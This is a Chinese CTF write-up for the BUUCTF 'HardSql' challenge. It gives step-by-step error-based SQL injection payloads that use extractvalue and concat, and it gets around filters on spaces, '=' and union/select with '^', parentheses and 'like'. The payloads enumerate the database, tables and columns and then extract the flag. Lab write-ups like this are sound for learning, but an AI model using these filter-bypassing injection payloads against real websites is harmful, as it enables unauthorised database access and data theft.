50.【8】BUUCTF WEB HardSql

进入靶场

随便输输

上order by

????????,被过滤了,继续找其他也被过滤的关键字

#,-- -,-- +都不行,尝试其他特殊字符后发现and,union,select,空格,=都被过滤了

如下

我就不知道该怎么注入了

看看其他人的wp,直接在url处输入用户名和密码,并且用到了extractvalue函数,concat函数

1.查询库名

aaa'^extractvalue(1,concat(0x7e,(select(database()))))%23

(特殊符号^是用来绕过对空格的过滤)(0x7e表示~)(用了很多括号来避免空格的使用)

2.查询表名

aaa'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))%23

(用like表示=)

3.查询字段名

aaa'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))%23

4,查询字段内容

aaa'^extractvalue(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1))))%23

XPATH syntax error: '~flag{d3f924ee-7d15-4a27-9fd8-c5'

5,从后往前查询

aaa'^extractvalue(1,right(concat(0x7e,(select(group_concat(password))from(H4rDsq1))),32))%23

XPATH syntax error: 'fd8-c5239a11bb58}'

6,拼接

flag{d3f924ee-7d15-4a27-9fd8-c5239a11bb58}

over

笔记

1,

extractvalue() 函数:

extractvalue() 是 MySQL 的一个 XML 函数,用于从 XML 字符串中提取值。它的第一个参数是 XML 文档或片段,第二个参数是 XPath 表达式,用于定位要提取的值,第一个参数 1 通常是一个不相关的占位,第二个参数是攻击者精心构造的恶意表达式。

2,

concat() 函数:

concat() 函数用于拼接字符串。在这个例子中,攻击者使用 concat(0x7e,(select(database()))) 来拼接字符串。

0x7e 是十六进制表示的字符 ~。

select(database()) 是 SQL 查询语句,用于获取当前使用的数据库名称。攻击者将 ~ 和查询到的数据库名称拼接在一起。

3,

%23:

%23 是 # 的 URL 编码

相关推荐
许长安1 天前
RPC 同步调用基本使用方法:基于官方 RouteGuide 示例
c++·经验分享·笔记·rpc
S1998_1997111609•X1 天前
论当今社会主义与人文关怀人格思想下的恶意仿生注入污染蜜罐描述进行函数值非法侵入爬虫的咼忄乂癿〇仺⺋.
数据库·网络协议·百度·ssh·开闭原则
倔强的石头_1 天前
kingbase备份与恢复实战(六)—— 备份自动化与保留策略:Windows任务计划+日志追溯
数据库
轻刀快马1 天前
别被 ORM 框架宠坏了:从一场“订单消失”悬案,看懂 MySQL 为什么要强推 InnoDB
数据库·mysql
学网安的肆伍1 天前
【043-WEB攻防篇】PHP应用&SQL注入&符号拼接&请求方法&HTTP头&JSON&编码类
sql·安全·php
做cv的小昊1 天前
【TJU】研究生应用统计学课程笔记(8)——第四章 线性模型(4.1 一元线性回归分析)
笔记·线性代数·算法·数学建模·回归·线性回归·概率论
我命由我123451 天前
程序员的心理学学习笔记 - 空杯心态
经验分享·笔记·学习·职场和发展·求职招聘·职场发展·学习方法
后端漫漫1 天前
Redis 客户端工具体系
数据库·redis·缓存
stm32 菜鸟1 天前
nucleo-f411re学习记录-13,flash的操作
学习
晓梦林1 天前
3170靶场学习笔记
笔记·学习